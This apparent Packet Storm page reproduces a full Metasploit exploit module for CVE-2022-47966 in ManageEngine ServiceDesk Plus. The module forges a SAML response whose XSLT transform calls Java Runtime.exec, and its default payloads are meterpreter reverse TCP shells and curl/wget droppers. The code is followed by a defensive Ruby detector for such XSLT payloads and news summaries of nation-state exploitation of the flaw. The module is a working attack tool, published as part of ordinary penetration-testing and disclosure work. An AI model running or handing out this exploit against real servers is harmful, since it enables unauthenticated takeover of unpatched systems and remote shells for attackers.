
Zoho ManageEngine ServiceDesk Plus 14003 Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (CVE-2022-47966). Due to a dependency on an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Packet Storm
```ruby
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine ServiceDesk Plus Unauthenticated SAML RCE',
        'Description' => %q{
          This exploits an unauthenticated remote code execution vulnerability
          that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and
          below (CVE-2022-47966). Due to a dependency to an outdated library
          (Apache Santuario version 1.4.1), it is possible to execute arbitrary
          code by providing a crafted `samlResponse` XML to the ServiceDesk Plus
          SAML endpoint. Note that the target is only vulnerable if it has been
          configured with SAML-based SSO at least once in the past, regardless of
          the current SAML-based SSO status.
        },
        'Author' => [
          'Khoa Dinh', # Original research
          'horizon3ai', # PoC
          'Christophe De La Fuente' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-47966'],
          ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],
          ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],
          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],
          ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']
        ],
        'Platform' => ['win', 'unix', 'linux'],
        'Payload' => {
          'BadChars' => "\x27"
        },
        'Targets' => [
          [
            'Windows EXE Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :windows_command,
              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => { 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' },
              'CmdStagerFlavor' => %w[curl wget echo lwprequest]
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 8080
        },
        'DefaultTarget' => 1,
        'DisclosureDate' => '2023-01-10',
        'Notes' => {
          'Stability' => [CRASH_SAFE,],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'Privileged' => true
      )
    )

    register_options([
      OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),
      OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(datastore['TARGETURI'])
    )
    return CheckCode::Unknown unless res

    # vulnerable servers respond with 400 and a HTML body
    return CheckCode::Safe unless res.code == 400

    script = res.get_html_document.xpath('//script[contains(text(), "BUILD_NUMBER")]')
    info = script.text.match(/PRODUCT_NAME\\x22\\x3A\\x22(?<product>.+?)\\x22,.*BUILD_NUMBER\\x22\\x3A\\x22(?<build>[0-9]+?)\\x22,/)
    return CheckCode::Unknown unless info

    unless info[:product] == 'ManageEngine\\x20ServiceDesk\\x20Plus'
      return CheckCode::Safe("This is not ManageEngine ServiceDesk Plus (#{info[:product]})")
    end

    # SAML 2.0 support has been added in build 10511
    # see https://www.manageengine.com/products/service-desk/on-premises/readme.html#readme105
    build = Rex::Version.new(info[:build])
    unless build >= Rex::Version.new('10511') && build <= Rex::Version.new('14003')
      return CheckCode::Safe("Target build is #{info[:build]}")
    end

    CheckCode::Appears
  end

  def encode_begin(real_payload, reqs)
    super

    reqs['EncapsulationRoutine'] = proc do |_reqs, raw|
      raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw
    end
  end

  def exploit
    case target['Type']
    when :windows_command, :unix_cmd
      execute_command(payload.encoded)
    when :windows_dropper, :linux_dropper
      execute_cmdstager(delay: datastore['DELAY'])
    end
  end

  def execute_command(cmd, _opts = {})
    case target['Type']
    when :windows_dropper
      cmd = "cmd /c #{cmd}"
    when :unix_cmd, :linux_dropper
      cmd = cmd.gsub(' ') { '${IFS}' }
      cmd = "bash -c #{cmd}"
    end

    cmd = cmd.encode(xml: :attr).gsub('"', '')

    assertion_id = "_#{SecureRandom.uuid}"
    # Randomize variable names and make sure they are all different using a Set
    vars = Set.new
    loop do
      vars << Rex::Text.rand_text_alpha_lower(5..8)
      break unless vars.size < 3
    end
    vars = vars.to_a

    saml = <<~EOS
      <?xml version="1.0" encoding="UTF-8"?>
      <samlp:Response
        ID="_#{SecureRandom.uuid}"
        InResponseTo="_#{Rex::Text.rand_text_hex(32)}"
        IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
        <samlp:Status>
          <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
        </samlp:Status>
        <Assertion ID="#{assertion_id}"
          IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
          <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>
          <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:SignedInfo>
              <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
              <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
              <ds:Reference URI="##{assertion_id}">
                <ds:Transforms>
                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
                    <xsl:stylesheet version="1.0"
                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
                      <xsl:template match="/">
                        <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
                        <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
                        <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
                        <xsl:value-of select="$#{vars[2]}"/>
                      </xsl:template>
                    </xsl:stylesheet>
                  </ds:Transform>
                </ds:Transforms>
                <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
                <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue>
              </ds:Reference>
            </ds:SignedInfo>
            <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue>
            <ds:KeyInfo/>
          </ds:Signature>
        </Assertion>
      </samlp:Response>
    EOS

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI']),
      'vars_post' => {
        'SAMLResponse' => Rex::Text.encode_base64(saml)
      }
    })

    unless res&.code == 500
      lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
      unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }
        elog("Unkown error returned:\n#{lines.join("\n")}")
        fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res&.code}). See logs for details.")
      end
      fail_with(Failure::NoAccess, 'Maximum access limit exceeded (wait at least 1 minute and increase the DELAY option value)')
    end

    res
  end
end
```
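The crafted `SAMLResponse` above relies on an XSLT transform inside `ds:Transforms` and on Xalan Java extension namespaces. The following detection check is an added example, not part of the module or the original page: it decodes a logged `SAMLResponse` value and reports those markers. The helper names (`inspect_saml_response`, `sample`), the finding labels and both samples are assumptions constructed for illustration.

```ruby
require 'base64'
require 'rexml/document'

DSIG_NS    = 'http://www.w3.org/2000/09/xmldsig#'
XSLT_ALG   = 'http://www.w3.org/TR/1999/REC-xslt-19991116'
XSL_NS     = 'http://www.w3.org/1999/XSL/Transform'
XALAN_JAVA = 'http://xml.apache.org/xalan/java'

# Hypothetical helper: returns finding labels for one form-decoded
# SAMLResponse parameter value (base64 of the XML document).
def inspect_saml_response(b64_value)
  xml = Base64.decode64(b64_value).force_encoding('UTF-8').scrub
  # A SAML message has no reason to carry a DTD: flag it and do not parse.
  return ['dtd-present'] if xml.match?(/<!DOCTYPE/i)

  findings = []
  REXML::XPath.match(REXML::Document.new(xml), '//*').each do |el|
    if el.namespace == DSIG_NS && el.name == 'Transform' &&
       el.attributes['Algorithm'] == XSLT_ALG
      findings << 'xslt-transform'
    end
    findings << 'xsl-element' if el.namespace == XSL_NS
    if el.namespaces.values.any? { |uri| uri.start_with?(XALAN_JAVA) }
      findings << 'xalan-java-namespace'
    end
  end
  findings.uniq
rescue REXML::ParseException
  ['unparseable']
end

# Constructed samples, not captured traffic. The stylesheet is empty: only the
# declarations the detector keys on are present.
def sample(transform_body, algorithm)
  Base64.strict_encode64(<<~XML)
    <Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" ID="_a1">
      <ds:Signature xmlns:ds="#{DSIG_NS}"><ds:SignedInfo>
        <ds:Reference URI="#_a1"><ds:Transforms>
          <ds:Transform Algorithm="#{algorithm}">#{transform_body}</ds:Transform>
        </ds:Transforms></ds:Reference>
      </ds:SignedInfo></ds:Signature>
    </Assertion>
  XML
end

FLAGGED = sample(%(<xsl:stylesheet version="1.0" xmlns:xsl="#{XSL_NS}" ) +
                 %(xmlns:rt="#{XALAN_JAVA}/java.lang.Runtime"/>), XSLT_ALG)
BENIGN  = sample('', 'http://www.w3.org/2001/10/xml-exc-c14n#')
```

The SAML 2.0 core specification recommends that signatures use only the enveloped-signature and exclusive canonicalization transforms, so any `xslt-transform` finding on traffic to the SAML endpoint warrants investigation.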

Related news

Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors

Iranian nation-state actors have been conducting password spray attacks against thousands of organizations globally between February and July 2023, new findings from Microsoft reveal. The tech giant, which is tracking the activity under the name Peach Sandstorm (formerly Holmium), said the adversary pursued organizations in the satellite, defense, and pharmaceutical sectors to likely facilitate

CISA Warning: Nation-State Hackers Exploit Fortinet and Zoho Vulnerabilities

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that multiple nation-state actors are exploiting security flaws in Fortinet FortiOS SSL-VPN and Zoho ManageEngine ServiceDesk Plus to gain unauthorized access and establish persistence on compromised systems. “Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized

Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware

The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called QuiteRAT. Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.

China's 'Volt Typhoon' APT Turns to Zoho ManageEngine for Fresh Cyberattacks

A recent campaign shows that the politically motivated threat actor has more tricks up its sleeve than previously known, targeting an old RCE flaw and wiping logs to cover their tracks.

Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code

The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems. "While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a

Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems

An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 and mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align

Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access

Zoho ManageEngine Endpoint Central / MSP 10.1.2228.10 Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10 and below (CVE-2022-47966). Due to a dependency on an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the Endpoint Central SAML endpoint. Note that the target is only vulnerable if it is configured with SAML-based SSO, and the service should be active.

ManageEngine ADSelfService Plus Unauthenticated SAML Remote Code Execution

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ADSelfService Plus versions 6210 and below. Due to a dependency on an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ADSelfService Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Unpatched Zoho ManageEngine Products Under Active Cyberattack

The latest critical bug is exploitable in dozens of ManageEngine products and exposes systems to catastrophic risks, researchers warn.

Zoho ManageEngine PoC Exploit to be Released Soon - Patch Before It's Too Late!

Users of Zoho ManageEngine are being urged to patch their instances against a critical security vulnerability ahead of the release of a proof-of-concept (PoC) exploit code. The issue in question is CVE-2022-47966, an unauthenticated remote code execution vulnerability affecting several products due to the use of an outdated third-party dependency, Apache Santuario. "This vulnerability allows an

Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability

Proof of Concept code is about to be released for a vulnerability in many ManageEngine products which could enable RCE with SYSTEM privileges. The post Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability appeared first on Malwarebytes Labs.

CVE-2019-19034: AssetExplorer ITAM Solution ServicePacks Readme

Zoho ManageEngine Asset Explorer 6.5 does not validate the System Center Configuration Manager (SCCM) database username when dynamically generating a command to schedule scans for SCCM. This allows an attacker to execute arbitrary commands on the AssetExplorer Server with NT AUTHORITY/SYSTEM privileges.
